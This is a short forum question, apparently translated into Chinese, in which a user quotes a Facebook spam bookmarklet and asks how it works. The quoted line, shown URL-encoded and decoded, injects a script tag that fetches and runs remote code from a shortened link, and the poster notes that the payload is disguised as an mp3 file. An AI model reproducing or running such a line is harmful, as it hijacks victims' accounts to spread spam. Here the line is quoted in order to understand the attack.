所以,我刚刚在 Facebook 上看到了这个用 JavaScript 编写的垃圾邮件代码,我想知道是否有人可以向我解释代码是如何工作的,以及如何与 Facebook 交互。我不打算将其用于恶意目的,但我只是对 Facebook 等网站的安全性感兴趣。这是从地址栏执行的代码(我建议不要自己尝试,你可能最终会遇到一些恼人的朋友)。
javascript: (a%3D(b%3Ddocument).createElement('script')).src%3D'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BM ath.random()%2Cb.body.appendChild(a)%3Bvoid(0)
在这里检查一下,链接是 url 编码的。:
http://meyerweb.com/eric/tools/dencoder/
javascript:
a=(b=document).createElement('script')).src='http://bit.ly/FB1337?'+Math.random(),b.body.appendChild(a);void(0)
从我所看到的:将此网址加载为脚本并将其添加到当前页面。
编辑: 加载的脚本放在这个网址:http ://www.raxarstudios.com/x/audiotrack2.mp3
它被伪装成一首 mp3 歌曲,但它只是 javascript: http: //pastebin.com/RVmNVtt9 我快速浏览了一下,它显然使用了一些沉重的 ajax 来添加事件并加入你自己。